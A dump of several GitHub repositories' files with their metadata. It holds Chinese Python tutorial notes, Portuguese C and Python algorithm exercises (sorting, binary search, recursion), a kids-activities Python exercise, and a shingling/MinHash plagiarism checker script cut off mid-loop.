五、Pyhton编辑器\n\n推荐两种编辑器,但绝对不能用word和记事本,因为word保存的不是纯文本文件,记事本不知道是啥原因,可能是编码的问题吧\n- [Sublime Text](http://www.sublimetext.com/)\n- [Notepd++](http://notepad-plus-plus.org/)\n\n比如在D: /python文件下创建helloworld.py文件\n里面输入:\n\n```\nprint('helloworld from notepad')\n```\n然后到命令行进入到相应文件夹下下输入\npython helloworld.py,则会输出 helloworld from notepad.\n* 文件名只能是英文字母、数字和下划线的组合\n* 如果在windows中想直接点击运行python文件,需要在.py文件的第一行加上特殊注释:\n\n```\n#!/usr/bin/env python3\nprint('helloworld from nodepad')\n```\n\n## 六、输入和输出\n\n- 输出:print()函数\n执行 print('helloworld'),则输出:\n\n```\nhelloworld\n```\n执行:\nprint(1+2)则输出:\n\n```\n3\n```\n执行:\nprint('1+2=',1+2)则输出:\n\n```\n1+2=3\n```\nprint里面的‘1+2=‘会被当做字符串输出,后面的1+2会被直接执行计算结果\n\n- 输入:input()函数\n执行:\n\n```\n>>> name = input()\n```\n交互环境则进入用户输入等待状态,用户输入Legend,点击回车后,则吧Legend的值赋值给了name,再输入name回车,则会输出name的值:Legend\n\n```\n>>> name\n'Legend'\n```\n## 总结:\n\n感觉还挺有意思的,和Java、C是不同,但是具体还得往后面看看。总算开了个头,后面好好坚持吧!前戏结束了,该切入正题了,好激动。\n\n" }, { "alpha_fraction": 0.6471773982048035, "alphanum_fraction": 0.6950604915618896, "avg_line_length": 
14.86400032043457, "blob_id": "93152939d38d0d705cb28841036546a5333d0bb2", "content_id": "c8611c1d07aeaa400f71de651b4cafc49e2fd812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3980, "license_type": "no_license", "max_line_length": 160, "num_lines": 125, "path": "/python_legend/doc/基础语法一.md", "repo_name": "LoggerWang/python_study", "src_encoding": "UTF-8", "text": "## python 基础语法\n\n### 一、标识符\n- 标识符可以包括英语、数字以及下划线,但是不能以数字开头\n- python中的标识符是区分大小写的\n- 以下划线开头的标识符有特殊意义。\n 1、以单下划线开发(_foo)的标识符表示不能直接访问的类属性,需要通过类提供的接口进行访问;\n 2、以双下划线开头的(__foo)代表类的私有成员\n 3、一双下划线开头和结尾的(__foo__)代表python里的特殊方法专用标识符,如__init__()代表类的构造函数\n\n-保留字符:\nand exec not assert finally or break for pass class from print continue global raise drf if return del import try elif in while else is with except lambda yield\n\n### 二、行和缩进\n- Python和其他语言最大的区别就是python代码块不适用大括号{}来控制类、函数以及其他逻辑判断。那用什么呢?---缩进!比如:\n\n```\n# 这是注释,用#表示\na = 100\nif a >= 0:\n print(a)\nelse:\n print(-a)\n```\n其中,#表示注释的语句,编译的时候回忽略,其他每一行都是一个语句,当语句以:冒号结尾是,缩进的语句视为代码块。\n\n- 缩进并没有规定缩进几个空格还是Tab,一般使用4个空格的缩进\n- 所有代码块语句必须严格包含相同的缩进空格数量,不能混用\n\n- 缩进的好处就是迫使你把一段很长的代码拆分若干函数,从而得到缩进较少的代码\n\n- 缩进的坏处:不能复制粘贴\n\n\n### 三、注释\n- \"#\" 表示单行注释\n\n```\n'''\n 三个单引号或三个多引号表示多行注释\n'''\n\"\"\"\n 三个单引号或三个多引号表示多行注释\n\"\"\"\n```\n\n### 四、同一行显示多条语句\n- python中同一行可以写多条语句,用 ; 分割,如:\n\n```\n#!/usr/bin/python\n\nimport sys; x = 'runoob'; sys.stdout.write(x + '\\n')\n```\n\n\n### 五、数据类型\npython有五种标准的数据类型\n\n\n- Numbers(数字)\n- String(字符串)\n- List(列表)\n- Tuple(元祖)\n- Dictionary(字典)\n\n- 整数:和数学的写法一样:0,1,100,-1\n- 浮点数:按照科学计数法表示,小数点的位置是可变的,如1.23X10^8^和12.3X10^7^的值是一样的。但是对于很大或很小的浮点数,就必须用科学计数法表示,把10用e替代,1.23x109就是1.23e9,或者12.3e8,0.000012可以写成1.2e-5,等等\n\n整数和浮点数在计算机内部存储的方式是不同的,整数运算永远是精确的(除法难道也是精确的?是的!),而浮点数运算则可能会有四舍五入的误差。\n\n- 字符串,是以单引号'或双引号\"括起来的文本,比如'abc'.里面只有a,b,c这3个字符,如果想把'表示Wei一个字符就需要用双引号包起来,比如:\"I'm OK\",这里面有 I,',m,空格,O,K这6个字符\n- 转义字符:\\\n'I\\'m \\\"OK\\\"!' 
表示 字符串I'm\"OK\"\n\\n:换行\n\\t:制表符\n\\\\:\\\n\n- 布尔值 True或False两个值\n布尔值可以用and、or和not运算\n\n-空值 :None.None不能理解为0,因为0是有意义的,None是一个特殊的空值。\n\n- 变量:可以是数字,英文,下划线的组合,但是不能以数字开头。Pyhton的变量可以理解为动态语言,就是给变量赋值的时候不需要定义类型,如\n\n```\na = 123 #a是整数\na = \"AB\" #a是字符串\na = True #a是布尔值\n```\na = \"AB\"中\n给变量赋值的时候,内存中的表示是这样的:1.在内存中创建了一个'AB'的字符串;\n2在内存中创建了一个名为a的变量,并把它指向'AB'\n\n-除法,python有两种除法:\n1:/\n\n```\n>>> 10 / 3\n3.3333333333333335\n```\n\n/除法计算结果是浮点数,即使是两个整数恰好整除,结果也是浮点数:\n\n\n```\n>>> 9 / 3\n3.0\n```\n\n2:还有一种除法是//,称为地板除,两个整数的除法仍然是整数:\n\n\n```\n>>> 10 // 3\n3\n```\n\n你没有看错,整数的地板除//永远是整数,即使除不尽。要做精确的除法,使用/就可以\n-取余:\n\n```\n>>> 10 % 3\n1\n```\n\n" } ]
3
DirceuSilvestre/Algoritmos-Khan-Academy
https://github.com/DirceuSilvestre/Algoritmos-Khan-Academy
99601208daf616c208e4b1f604dac4fa6762bd71
9270e5b9eda05ab211702864185b0b697270c0f2
181d668ec0df62313b25150edb17a7b0315cb4bb
refs/heads/main
2023-08-03T17:06:39.279557
2021-10-02T06:09:44
2021-10-02T06:09:44
393,147,901
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.46898263692855835, "alphanum_fraction": 0.518610417842865, "avg_line_length": 20.210525512695312, "blob_id": "9a5878fe04832f80a9e648eb9254540ea7d71b0b", "content_id": "8ae0102bb944ed21e5c2b162ae7acb0167560b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 403, "license_type": "no_license", "max_line_length": 77, "num_lines": 19, "path": "/Quick Sort.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n\nint cmpfunc (const void * a, const void * b) {\n return ( *(int*)a - *(int*)b );\n}\n\nint main()\n{\n int vetor[] = {1, 50, 6, 35, 3, 67, 25, 2, 46, 79, 11};\n int i = 0;\n \n qsort(vetor, sizeof(vetor)/sizeof(int), sizeof(int), cmpfunc);\n \n while(i < ( sizeof(vetor)/sizeof(int) ) ){ printf(\"%d \", vetor[i]); i++;}\n printf(\"\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.36994218826293945, "alphanum_fraction": 0.38728323578834534, "avg_line_length": 24.163637161254883, "blob_id": "910ac6b5e112d858adbfbdc6e5bfa93a5b957f11", "content_id": "eaf6e243a0a4a9329bfb41b47c7258438a6a474b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1385, "license_type": "no_license", "max_line_length": 106, "num_lines": 55, "path": "/Selection Sort.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nvoid swap(int *vetor, int direcao)\n{\n int i, j, maior, posicao, troca;\n if (direcao == 0) //do maior para o menor\n {\n for (i = 0; i < ((sizeof(vetor)/2)); i++)\n {\n maior = 0;\n for (j = i; j < (sizeof(vetor)/2)+ 1; j++)\n {\n if (vetor[j] > maior)\n {\n maior = vetor[j];\n posicao = j;\n }\n }\n troca = vetor[i];\n vetor[i] = vetor[posicao];\n vetor[posicao] = troca;\n }\n }\n else if(direcao == 1) //do menor para o maior\n {\n for (i = 0; i < ((sizeof(vetor)/2)); i++)\n {\n maior = 999;\n for (j = i; 
j < (sizeof(vetor)/2)+ 1; j++)\n {\n if (vetor[j] < maior)\n {\n maior = vetor[j];\n posicao = j;\n }\n }\n troca = vetor[i];\n vetor[i] = vetor[posicao];\n vetor[posicao] = troca;\n }\n }\n}\n\nint main(void)\n{\n int vetor[] = {1, 3 , 2, 5, 4};\n int entrada;\n scanf(\"%d\", &entrada); //usuario escolhe a ordem, 0 decrescente e 1 crescente, outros números nada faz\n swap(vetor, entrada);\n for (int i = 0; i < (sizeof(vetor)/4); i++)\n {\n printf(\"%d\\n\", vetor[i]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6285714507102966, "alphanum_fraction": 0.6392857432365417, "avg_line_length": 18.34482765197754, "blob_id": "742aef4dbd4ce6751884dc576a4bf8a782bc0e09", "content_id": "b492e592d748b2cc6ca2b1b378a49bfa5fdeee8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 563, "license_type": "no_license", "max_line_length": 52, "num_lines": 29, "path": "/Palíndromo Recursivo.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdbool.h>\n#include <string.h>\n\nbool palindromo(char *palavra, int inicio, int fim)\n{\n\tfim -= 1;\n\tif (inicio == fim){ return true;}\n\telse\n\t{\n\t\tif (palavra[inicio] == palavra[fim])\n\t\t{\n\t\t\tinicio++;\n\t\t\treturn palindromo(palavra, inicio, fim);\n\t\t}\n\t\telse {return false;}\n\t}\n}\n\nint main(int argc, char const *argv[])\n{\n\tchar palavra[101];\n\tbool palindro;\n\tscanf(\"%[^\\n]\", palavra);\n\tpalindro = palindromo(palavra, 0, strlen(palavra));\n\tif (palindro == true){printf(\"É palindromo\\n\");}\n\telse {printf(\"Não é palindromo\\n\");}\n\treturn 0;\n}" }, { "alpha_fraction": 0.4739336371421814, "alphanum_fraction": 0.5545023679733276, "avg_line_length": 30.649999618530273, "blob_id": "d9e8a2a81a66b4e56b7168f0bfff43220eac2273", "content_id": "ac2669a4a03cfa38b32ca70e59ac82cfe3c20990", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 
638, "license_type": "no_license", "max_line_length": 105, "num_lines": 20, "path": "/Busca Binária em Array.py", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "primos = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]\nmin = 1\nmax = int(len(primos)-1)\nnumero = int(input(\"Qual numero primo quer encontrar? \"))\nwhile True:\n media = (min + max)//2\n x = primos[media]\n if max < min:\n print('Valor não encontrado, {} não é primo'.format(numero))\n break\n elif numero == x:\n print('Valor encontrado no array, {} é primo'.format(primos[media]))\n break\n elif x < numero:\n print('buscando mais')\n min = media + 1\n else:\n print('buscando menos')\n max = media - 1\nprint('Parabéns!')\n" }, { "alpha_fraction": 0.6306068897247314, "alphanum_fraction": 0.6385224461555481, "avg_line_length": 16.272727966308594, "blob_id": "c71dac9cb081a6190238a243e85723ff692565e6", "content_id": "13923c10cf903c601eeb627a6adbb63886d560a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 380, "license_type": "no_license", "max_line_length": 65, "num_lines": 22, "path": "/Potencia Recursiva.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint potencia(int base, int expoente)\n{\n\tif (expoente == 1)\n\t{\n\t\treturn base;\n\t}\n\telse\n\t{\n\t\treturn base * potencia(base, expoente - 1);\n\t}\n}\n\nint main(int argc, char const *argv[])\n{\n\tint base, expoente;\n\tprintf(\"Insira a potencia e a base com um espaço entre eles\\n\");\n\tscanf(\"%d %d\", &base, &expoente);\n\tprintf(\"%d\\n\", potencia(base, expoente));\n\treturn 0;\n}" }, { "alpha_fraction": 0.6472663283348083, "alphanum_fraction": 0.6613756418228149, "avg_line_length": 39.5, "blob_id": "593598b160188b28bfc5b31e7a8302393b27d322", "content_id": "57701fc8d71c2a4230bde9e0b9018cdca1085d79", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 573, "license_type": "no_license", "max_line_length": 77, "num_lines": 14, "path": "/Advinhação Binária.py", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "from random import randint\ncomputador = randint(1, 100)\nusuario = int(input('Qual número acha que o computador pensou, de 1 a 100?'))\nwhile True:\n if usuario == computador:\n print('Você advinhou, o numero pensado foi {}'.format(computador))\n break\n elif usuario < computador:\n print(f'Número digitado menor que o pensado')\n usuario = int(input('tente de novo: '))\n else:\n print(f'Número digitado maior que o pensado')\n usuario = int(input('digite novamente: '))\nprint(f'Só tenho duas palavras a dizer: Para, Béns!')\n" }, { "alpha_fraction": 0.4139534831047058, "alphanum_fraction": 0.42259135842323303, "avg_line_length": 22.169231414794922, "blob_id": "c0ad2003a5a4a7f2b3fa35000765bc79d17920c7", "content_id": "d5d0f1edf2e63f7fc209f10c5a650f1d901c1ed7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1506, "license_type": "no_license", "max_line_length": 106, "num_lines": 65, "path": "/Selection Sort Char.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h> \n#include <stdlib.h>\n#include <string.h>\n\nvoid sort_char(char *vetor, int entrada)\n{\n char troca, comparacao;\n int d = 0, tamanho;\n\n tamanho = strlen(vetor);\n \n while (d < tamanho)\n {\n if (entrada == 0)\n {\n comparacao = 'z';\n for (int i = d; vetor[i] != '\\0'; i++)\n {\n if (comparacao > vetor[i])\n {\n comparacao = vetor[i];\n\n troca = vetor[d];\n vetor[d] = comparacao;\n vetor[i] = troca; \n }\n }\n }\n else if (entrada == 1)\n {\n comparacao = 'a';\n for (int i = d; vetor[i] != '\\0'; i++)\n {\n if (comparacao < vetor[i])\n {\n comparacao = vetor[i];\n\n troca = vetor[d];\n vetor[d] = comparacao;\n 
vetor[i] = troca; \n }\n }\n }\n d++;\n }\n}\n \nint main(int argc, char const *argv[])\n{\n char vetor[101];\n int entrada;\n\n printf(\"Digite as letras que o vetor vai guardar\\n\");\n scanf(\"%[^\\n]\", vetor);\n\n printf(\"Digite a ordem, crescente 0 ou decrescente 1\\n\");\n scanf(\"%d\", &entrada); //usuario escolhe a ordem, 1 decrescente e 0 crescente, outros números nada faz\n \n sort_char(vetor, entrada);\n \n printf(\"Vetor ordenado\\n\");\n \n printf(\"%s\\n\", vetor);\n return 0;\n}" }, { "alpha_fraction": 0.619178056716919, "alphanum_fraction": 0.6356164216995239, "avg_line_length": 20.52941131591797, "blob_id": "0aebb4018d8fda7853c9167dfd143480f6fafaaf", "content_id": "0c2f4ce09a6cdecefa0888dbde9c790debcff9a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 366, "license_type": "no_license", "max_line_length": 62, "num_lines": 17, "path": "/Fatorial Recursivo.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint fatorial(int fator)\n{\n\tif (fator == 2){return 2;}\n\telse{return (fator * fatorial(fator - 1));}\n}\n\nint main(int argc, char const *argv[])\n{\n\tint fator, resultado;\n\tprintf(\"Qual número quer saber o fatorial?\\n\");\n\tscanf(\"%d\", &fator);\n\tif (fator <= 0){printf(\"1\\n\");}\n\telse{resultado = fatorial(fator); printf(\"%d\\n\", resultado);}\n\treturn 0;\n}" }, { "alpha_fraction": 0.57419353723526, "alphanum_fraction": 0.603225827217102, "avg_line_length": 17.294116973876953, "blob_id": "9f95f2324cce6be6a2d724270a53910e8e1f1b2f", "content_id": "10e0bed2ded8e9939d80ef4df8fe5ce0d4802fd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 310, "license_type": "no_license", "max_line_length": 56, "num_lines": 17, "path": "/Serie Aritmetica.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint 
main(int argc, char const *argv[])\n{\n\tint entrada, serie_aritmetica;\n\tscanf(\"%d\", &entrada);\n\tif (entrada%2 == 0)\n\t{\n\t\tserie_aritmetica = (entrada + 1) * (entrada/2);\n\t}\n\telse\n\t{\n\t\tserie_aritmetica = (entrada + 1) * ((entrada/2)+ 0.5);\n\t}\n\tprintf(\"%d\\n\", serie_aritmetica);\n\treturn 0;\n}" }, { "alpha_fraction": 0.4121779799461365, "alphanum_fraction": 0.4449648857116699, "avg_line_length": 17.586956024169922, "blob_id": "325da51b7858bc091b26a70b39146be2b43a1489", "content_id": "038d0e67e893254030868df6d92258810f9ff80c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 855, "license_type": "no_license", "max_line_length": 66, "num_lines": 46, "path": "/Insertion Sort.c", "repo_name": "DirceuSilvestre/Algoritmos-Khan-Academy", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main(int argc, char const *argv[])\n{\n\tint array[101] = {3, 2, 4, 9, 6, 1}, entrada, tamanho, troca;\n\twhile(1)\n\t{\n\t\tprintf(\"Quer acrester um numero ao vetor? para não digite 0\\n\");\n\t\tscanf(\"%d\", &entrada);\n\t\tif (entrada == 0){break;}\n\t\telse\n\t\t{\n\t\t\ttamanho = 0;\n\t\t\tfor (int i = 0; array[i] != '\\0'; i++){tamanho++;}\n\t\t\tarray[tamanho + 1] = '\\0';\n\t\t\tarray[tamanho] = entrada;\n\n\t\t\tfor (int i = 1; array[i] != '\\0'; i++)\n\t\t\t{\n\t\t\t\tfor (int j = i; j > 0; j--)\n\t\t\t\t{\n\t\t\t\t\tif (array[j] < array[j - 1])\n\t\t\t\t\t{\n\t\t\t\t\t\ttroca = array[j];\n\t\t\t\t\t\tarray[j] = array[j - 1];\n\t\t\t\t\t\tarray[j - 1] = troca;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tprintf(\"(\");\n\t\t\tfor (int i = 0; array[i] != '\\0'; i++)\n\t\t\t{\n\t\t\t\tif (array[i + 1] == '\\0')\n\t\t\t\t{\n\t\t\t\t\tprintf(\"%d\", array[i]); \n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tprintf(\"%d, \", array[i]);\n\t\t\t\t}\n\t\t\t}\n\t\t\tprintf(\")\\n\");\n\t\t}\n\t}\n\treturn 0;\n}" } ]
10
sampita/Python_Activities_For_Kids
https://github.com/sampita/Python_Activities_For_Kids
b35cddadcb4672884adb3000207defa600a20a93
28a487cd4146f26432995a87daa568f85a61c985
4021a56b1cb681b69fb72da61ead491ea3f59bb2
refs/heads/master
2020-12-12T11:19:56.730313
2020-01-15T16:05:16
2020-01-15T16:05:16
234,115,472
0
0
null
2020-01-15T15:50:23
2020-01-15T15:51:16
2020-01-15T16:05:17
null
[ { "alpha_fraction": 0.6898989677429199, "alphanum_fraction": 0.6898989677429199, "avg_line_length": 30.967741012573242, "blob_id": "c1dfba8fcbcca410616c5f766c3cfc9b6660ec6e", "content_id": "766e4797573cb5b6b433ca0029e14a00e4466f20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 990, "license_type": "no_license", "max_line_length": 197, "num_lines": 31, "path": "/activitiesForKids.py", "repo_name": "sampita/Python_Activities_For_Kids", "src_encoding": "UTF-8", "text": "# Define four Python functions named run, swing, slide, and hide_and_seek. Each function should take a child's name as an argument. Each function should print that the child performed the activity.\ndef run(firstName):\n return {f'{firstName} runs fast'}\n\ndef swing(firstName):\n return {f'{firstName} swings high'}\n\ndef slide(firstName):\n return {f'{firstName} slides bravely'}\n\ndef hide_and_seek(firstName):\n return {f'{firstName} plays hide and seek'}\n\n# The following lists of children should be iterated, and the names sent to the appropriate functions.\n\nrunning_kids = [\"Pam\", \"Sam\", \"Andrea\", \"Will\"]\nswinging_kids = [\"Marybeth\", \"Jenna\", \"Kevin\", \"Courtney\"]\nsliding_kids = [\"Mike\", \"Jack\", \"Jennifer\", \"Earl\"]\nhiding_kids = [\"Henry\", \"Heather\", \"Hayley\", \"Hugh\"]\n\nfor kid in running_kids:\n print(run(kid))\n \nfor kid in swinging_kids:\n print(swing(kid))\n \nfor kid in sliding_kids:\n print(slide(kid))\n \nfor kid in hiding_kids:\n print(hide_and_seek(kid))" }, { "alpha_fraction": 0.7101669311523438, "alphanum_fraction": 0.7101669311523438, "avg_line_length": 46.14285659790039, "blob_id": "c4b76fff10946e8a6686f9bfe2d7151cf37f946a", "content_id": "761fae8083feaeb804e8fb6117955f8be4cbdf5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 659, "license_type": "no_license", "max_line_length": 203, "num_lines": 14, "path": "/README.md", 
"repo_name": "sampita/Python_Activities_For_Kids", "src_encoding": "UTF-8", "text": "# Python_Activities_For_Kids\n\n## Practice: Activities for Kids\nDefine four Python functions named `run`, `swing`, `slide`, and `hide_and_seek`. Each function should take a child's name as an argument. Each function should print that the child performed the activity.\n\nFor example, `Jay ran like a fool!` or `Chantelle slid down the slide!.`\n\nThe following lists of children should be iterated, and the names sent to the appropriate functions.\n\n```\nrunning_kids = [\"Pam\", \"Sam\", \"Andrea\", \"Will\"]\nswinging_kids = [\"Marybeth\", \"Jenna\", \"Kevin\", \"Courtney\"]\nsliding_kids = [\"Mike\", \"Jack\", \"Jennifer\", \"Earl\"]\nhiding_kids = [\"Henry\", \"Heather\", \"Hayley\", \"Hugh\"]" } ]
2
Ayush0406/Plaigarism-Checker
https://github.com/Ayush0406/Plaigarism-Checker
a7626276ec3d002ddb4154496f477932c7066a39
af98516a7b6fb0d5bee876eace2072666ba66959
db82914017ea1c4c924b306c3598125e8a18cd08
refs/heads/master
2020-08-31T19:52:29.670711
2019-10-31T13:53:10
2019-10-31T13:53:10
218,771,197
1
0
null
2019-10-31T13:21:59
2019-10-31T13:14:20
2019-10-31T13:14:18
null
[ { "alpha_fraction": 0.5315762162208557, "alphanum_fraction": 0.557002604007721, "avg_line_length": 30.2977352142334, "blob_id": "1fadceb098ae0cf3651c8b6ec827e0a04d974051", "content_id": "04dd1e54b350f557d8a83d7d364c4cf53ecd301d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9675, "license_type": "no_license", "max_line_length": 111, "num_lines": 309, "path": "/Shingles.py", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport random\nimport math\nimport pandas as pd\n\n\ndef intersection(lst1, lst2):\n return set(lst1).intersection(lst2)\n\ndef union(lst1, lst2):\n final_list = lst1 + lst2\n return final_list\n\n\n#file1 = open(r\"C:\\Users\\medet\\Desktop\\Year3Sem1\\Information retrieval\\ir1.txt\", \"r\")\n#yourpath = r\"C:\\Users\\medet\\Desktop\\ir_files\"\n#\n#\n## for filename in os.listdir(os.getcwd()):\n#d = {}\n#shingle = {}\n#len_doc = 0\n#for files in os.listdir(yourpath):\n# #print(files)\n# with open(yourpath+'\\\\'+files, \"r\") as fileobj:\n# sh = []\n# for x in fileobj:\n# for i in range(0, len(x)-9):\n# sh.append(x[i:i+9:1])\n# if not x[i:i+9:1] in shingle:\n# shingle[x[i:i+9:1]] = [len_doc]\n# #global_shingle.append(x[i:i+9:1])\n# else:\n# shingle[x[i:i+9:1]].append(len_doc)\n# # print(sh)\n# d[len_doc] = sh\n# len_doc = len_doc + 1\n# # print(len_doc)\n \n\ndf = pd.read_csv('news_summary.csv', sep=',', encoding='latin-1')\nd = {}\nshingle = {}\nlen_doc = 0\n\nfor x in range(0, 20):\n string = df['ctext'][x]\n sh = []\n for i in range(0, len(string)-9):\n sh.append(string[i:i+9:1])\n if not string[i:i+9:1] in shingle:\n shingle[string[i:i+9:1]] = [len_doc]\n #global_shingle.append(x[i:i+9:1])\n else:\n shingle[string[i:i+9:1]].append(len_doc)\n d[len_doc] = sh\n len_doc += 1\n#print(d[5])\nprint(len_doc)\n\nfor key,value in shingle.items():\n list1 = set(value)\n shingle[key] = list(list1)\n\n\n# making the list obtained 
as value from 9-shingle key unique\nfor key, value in shingle.items():\n list1 = set(value)\n shingle[key] = list(list1)\n\n# printing modified shingle dictionary\n# print(\"printing modified shingle dictionary\")\n# for key, value in shingle.items():\n # print(key)\n # print(value)\n\n\n# doing random tests for correctness(to be deleted later)\n# print(d[1])\n# print(shingle[\"nment wil\"])\n# print(len(shingle))\n# print(finalArray)\nshin_hash = {}\nh = 0\nfor i in shingle:\n shin_hash[h] = i\n h = h + 1\n\n\n# building the input matrix\nfinalArray = np.zeros(shape=(len(shingle), len_doc))\ne = 0\nfor key, value in shingle.items():\n # print(value)\n for i in value:\n finalArray[e][i] = 1\n e = e + 1\n\n# print(finalArray[450:560])\n\n# building the signature matrix using hash functions\n\n# print(\"printing mul and add lists\")\n# initializing signature matrix and filling with infinity values\nsig_mat = np.zeros(shape = (100, len_doc))\nfor i in range(0,100):\n for j in range(0,len_doc):\n sig_mat[i][j] = 9999999\n\nprint(type(sig_mat))\n# building list that will be used for multiplication with x in hash function ax + b i.e. a\nmul_list = set(random.sample(range(0, 1000), 100))\nwhile(len(mul_list)<100):\n mul_list.append(random.sample(range(0, 1000), 1)[0])\nmul_list = list(mul_list)\nprint(mul_list)\n\n# building list that will be used for addition in h(x) in hash function ax + b i.e. 
b\nadd_list = set(random.sample(range(0, 1000), 100))\nwhile(len(add_list)<100):\n add_list.append(random.sample(range(0, 1000), 1)[0])\nadd_list = list(add_list)\nprint(add_list)\n\n# building 100 hash functions\nprint(\"printing signature matrix\")\nr2 = 0\nfor i in range(0, len(mul_list)):\n for k in range(0,len(shingle)):\n h = (int)(mul_list[i]*(k+1) + add_list[i])%(len(shingle))\n for l in range(0,len_doc):\n if finalArray[k][l] == 1:\n if sig_mat[r2][l] > h:\n sig_mat[r2][l] = h\n r2 = r2 + 1\n# print(sig_mat)\n\ndef cal_jaccard_score(sigmat,d1,d2):\n intersec = 0\n uni = 0\n for i in range(0,len(sigmat)):\n if sigmat[i][d1] == sigmat[i][d2]:\n intersec += 1\n uni = len(sigmat)\n return intersec/uni\n\ndef cal_cosine_score(sig_mat,d1,d2):\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n for k in range(0, len(sig_mat)):\n mult = mult + sig_mat[k][d1] * sig_mat[k][d2]\n mod_doc1 = mod_doc1 + sig_mat[k][d1] * sig_mat[k][d1]\n mod_doc2 = mod_doc2 + sig_mat[k][d2] * sig_mat[k][d2]\n cosine_sim = mult / (math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n return cosine_sim\n\n\n\n\n\"\"\"def hash_signature(sig_mat, b, r):\n dictionary = list() # a list to store hashed buckets\n buckets = {} # a dictionary to store hashes of one band of size r rows\n print(\"entering hashSig\", b, r)\n startIndex = 0\n bands_done = 0\n for k in range(0, b): # iterating through each bands\n for i in range(0, len(sig_mat.T)): # iterating through each column given by transpose of sig_mat\n toCompress = '' # string to be compressed\n for j in range(startIndex, r + startIndex):\n print(j)\n toCompress += (str(int(sig_mat[j][i])))\n print(\"toCompress is \", toCompress)\n print(toCompress)\n bytesObject = bytes(toCompress.encode('latin-1'))\n c = Compressor()\n c.use_zlib()\n c.compress(toCompress, zlib_level=3)\n print(toCompress)\n startIndex += r\n # bands_done += 1\n\n# hash_signature(sig_mat, 15, 5)\n\"\"\"\ndictionary = list() # a list to store hashed buckets\ndef hash_signature2(sig_mat, b, 
r):\n print(\"entering hashSig\", b, r)\n startIndex = 0\n for k in range(0, b): # iterating through each bands\n buckets = {} # a dictionary to store hashes of one band of size r rows\n for i in range(0, len_doc): # iterating through each column given by transpose of sig_mat\n toCompress = '' # string to be compressed\n for j in range(startIndex, r + startIndex):\n #print(j)\n toCompress += (str(int(sig_mat[j][i])))\n if toCompress not in buckets:\n buckets[str(toCompress)] = [i]\n else:\n buckets[str(toCompress)].append(i)\n startIndex += r\n # bands_done += 1\n dictionary.append(buckets)\n print(\"printing list of hashtables\")\n e = 0;\n for i in dictionary:\n print(\"bucket\",e)\n for key, hash in i.items():\n print(key,hash)\n e += 1\n\n# hash_signature(sig_mat, 15, 5)5\n\ndef cal_jacc_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_jaccard_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_jaccard_score(sig_mat,hash[j],hash[k])\n #print(cal_jaccard_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\ndef cal_cosine_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_cosine_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_cosine_score(sig_mat,hash[j],hash[k])\n #print(cal_cosine_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\n# finding jaccard similarity between each pair of columns in original input matrix(finalArray)\nprint(\"printing similarity between rows\")\ncandidate_pairs = []\nfor i in range(0,len_doc):\n for j in 
